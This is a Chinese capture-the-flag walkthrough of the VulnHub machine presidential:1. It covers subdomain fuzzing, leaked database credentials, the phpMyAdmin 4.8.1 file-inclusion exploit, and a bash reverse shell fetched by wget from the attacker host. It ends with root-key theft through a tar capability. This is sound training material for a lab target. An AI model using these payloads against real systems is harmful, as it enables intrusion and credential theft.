Vulnhub篇presidential:1


0x00



靶机信息





靶机:presidential:1

难度:中-难

下载:https://www.vulnhub.com/entry/presidential-1,500/

0x01



信息收集





靶场网段:192.168.250.0/24

Nmap扫描靶场网段,寻找目标靶机IP以及相关端口以及服务

nmap -sn 192.168.250.0/24nmap -sV -p- 192.168.250.132

图片

IP:192.168.250.132

端口:80(http)2082(ssh)

1cec46e547109403f07cc562a5974c19.jpg

打开网站,果不其然也是个静态页面,但是页面内有个邮箱,邮箱的域名我们本地改host绑定一下

685063ea19fd3377009c2e8ed2b400be.jpg

接下来扫描目录寻找有价值的信息

nikto -h  http://votenow.local

c18b46ffe31c7a8bb1eb09fabdda3b6d.jpg

打开config.php一片空白

97ffc56e867441e80de0e4243b0e21ae.jpg

使用dirsearch再扫下目录看看有没有漏扫

python3 dirsearch.py -u http://votenow.local -e php

f10908dc4f4c1dfbd05bf33693a6167b.jpg

config.php.bak同样的一片空白,但是在源码内,有一些重要信息

bbc2f775ca3936cceeffe27e62c25afa.jpg

是数据库的账号密码,但是数据库页面还没见到个影,爆破一下子域名试试

wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.votenow.local" --hw 854 --hc 400 votenow.loca

36e1edc81c783d0714bfcb7f0be1de41.jpg

再次去host里绑定

c9dd30bdbdc95bd483aa6fa794a2f048.jpg

用config.php.bak里的账号密码登入

04cef93d5c916023f69f9a4028be3558.jpg

user表有一个账号密码加密了,使用john解密

john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt john.txt

0x02



漏洞利用





phpmyadmin的版本为4.8.1,这个版本有本地包含漏洞

开始利用

SQL执行

select '<?php phpinfo();exit;?>'

5f584aef77cec82d804c2df453d736a6.jpg

然后包含session

http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_4ribtr9diq98423tqfja79srek4ol8sj

ce48253ae34055c88c0ff8652f893af0.jpga6c2f077dd490bda8898894b4ca840f6.jpg

创建反弹文件

cd /var/www/html | echo 'bash -i >& /dev/tcp/192.168.250.129/1100 0>&1' > shell.s

再执行SQL命令

select '<?php system("wget 192.168.250.129/shell.sh; chmod +x shell.sh; bash shell.sh");exit;?>'

3240e133cc239a57bc587e09d7aec0af.jpg

nc开始监听

nc -lvv 1100

a5bd9321506d33f547d0aa27c91b5e26.jpg

解决shell输入字母会变成双写

python -c 'import pty; pty.spawn("/bin/bash")'

0x03



提权





我们切换用户到admin用户,密码是Stella,之前user表解密出来的

a93e22c9bd4f6b0bcc4ad78a034cd2ec.jpg

尝试提权,sudo提权失败,根目录的notes.txt文件提示的大概意思就是让我们使用压缩的命令

a6b81e4197e30f6c4f0be859ed6340ef.jpg

使用tars

tarS -cvf key.tar /root/.ssh/id_rsatar -xvf key.tarcd root/.sshssh -i id_rsa root@localhost -p 2082

00e6417896ba539aea1dfb2deb269542.jpg

至此通关







e81280f5ca59675072c8b308a762fd87.jpg

扫二维码|关注我们


微信号|靶机世界

猜你喜欢

转载自blog.51cto.com/15110043/2633525
今日推荐